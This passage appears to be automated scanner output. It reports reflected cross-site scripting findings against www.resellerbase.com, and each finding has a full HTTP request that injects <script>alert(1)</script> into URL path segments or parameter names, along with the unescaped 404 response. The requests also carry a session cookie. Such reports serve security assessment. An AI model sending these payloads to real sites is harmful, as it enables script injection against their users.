This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service8873a<script>alert(1)</script>4fb9acd74a0/domain-names/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service8873a<script>alert(1)</script>4fb9acd74a0/domain-names/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.4987. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a462<script>alert(1)</script>1eae58848c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names4a462<script>alert(1)</script>1eae58848c1/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names4a462<script>alert(1)</script>1eae58848c1/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.4988. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 78c95<script>alert(1)</script>ce751d897c3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes78c95<script>alert(1)</script>ce751d897c3/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes78c95<script>alert(1)</script>ce751d897c3/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.4989. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1fe28<script>alert(1)</script>d72b927ebaa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos1fe28<script>alert(1)</script>d72b927ebaa/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos1fe28<script>alert(1)</script>d72b927ebaa/images/ was not found on this server.</p>
...[SNIP]...

2.4990. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fd00d<script>alert(1)</script>9e84e8c28a5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/imagesfd00d<script>alert(1)</script>9e84e8c28a5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/imagesfd00d<script>alert(1)</script>9e84e8c28a5/ was not found on this server.</p>
...[SNIP]...

2.4991. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4ba89<script>alert(1)</script>3cf4e1215f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/?4ba89<script>alert(1)</script>3cf4e1215f7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/?4ba89<script>alert(1)</script>3cf4e1215f7=1 was not found on this server.</p>
...[SNIP]...

2.4992. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/folder.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c27c7<script>alert(1)</script>b9f02130e1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicec27c7<script>alert(1)</script>b9f02130e1d/domain-names/themes/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicec27c7<script>alert(1)</script>b9f02130e1d/domain-names/themes/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.4993. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/folder.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a190b<script>alert(1)</script>6982e2faf7b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-namesa190b<script>alert(1)</script>6982e2faf7b/themes/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-namesa190b<script>alert(1)</script>6982e2faf7b/themes/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.4994. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/folder.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6e28c<script>alert(1)</script>a027002a2f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes6e28c<script>alert(1)</script>a027002a2f0/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes6e28c<script>alert(1)</script>a027002a2f0/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.4995. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/folder.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 71176<script>alert(1)</script>2974f9248db was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos71176<script>alert(1)</script>2974f9248db/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos71176<script>alert(1)</script>2974f9248db/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.4996. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/folder.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fc452<script>alert(1)</script>6c59bf0e597 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/imagesfc452<script>alert(1)</script>6c59bf0e597/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/imagesfc452<script>alert(1)</script>6c59bf0e597/folder.gif was not found on this server.</p>
...[SNIP]...

2.4997. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/folder.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7ad62<script>alert(1)</script>80e921a4a48 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/folder.gif7ad62<script>alert(1)</script>80e921a4a48 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/folder.gif7ad62<script>alert(1)</script>80e921a4a48 was not found on this server.</p>
...[SNIP]...

2.4998. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/folder.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/folder.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2917c<script>alert(1)</script>17bc6454fe5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/folder.gif?2917c<script>alert(1)</script>17bc6454fe5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/folder.gif?2917c<script>alert(1)</script>17bc6454fe5=1 was not found on this server.</p>
...[SNIP]...

2.4999. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 81172<script>alert(1)</script>14308f892b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service81172<script>alert(1)</script>14308f892b8/domain-names/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service81172<script>alert(1)</script>14308f892b8/domain-names/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5000. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 63025<script>alert(1)</script>8f3a054a49f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names63025<script>alert(1)</script>8f3a054a49f/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names63025<script>alert(1)</script>8f3a054a49f/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5001. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload aa6c2<script>alert(1)</script>cf979a99ac6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themesaa6c2<script>alert(1)</script>cf979a99ac6/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themesaa6c2<script>alert(1)</script>cf979a99ac6/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5002. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b6ec6<script>alert(1)</script>723d18d6647 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmosb6ec6<script>alert(1)</script>723d18d6647/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmosb6ec6<script>alert(1)</script>723d18d6647/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5003. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 49832<script>alert(1)</script>3a9c70d361f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images49832<script>alert(1)</script>3a9c70d361f/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images49832<script>alert(1)</script>3a9c70d361f/rating/ was not found on this server.</p>
...[SNIP]...

2.5004. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload dfdf2<script>alert(1)</script>e69feba8512 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/ratingdfdf2<script>alert(1)</script>e69feba8512/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/ratingdfdf2<script>alert(1)</script>e69feba8512/ was not found on this server.</p>
...[SNIP]...

2.5005. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload de014<script>alert(1)</script>11f71656671 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/?de014<script>alert(1)</script>11f71656671=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
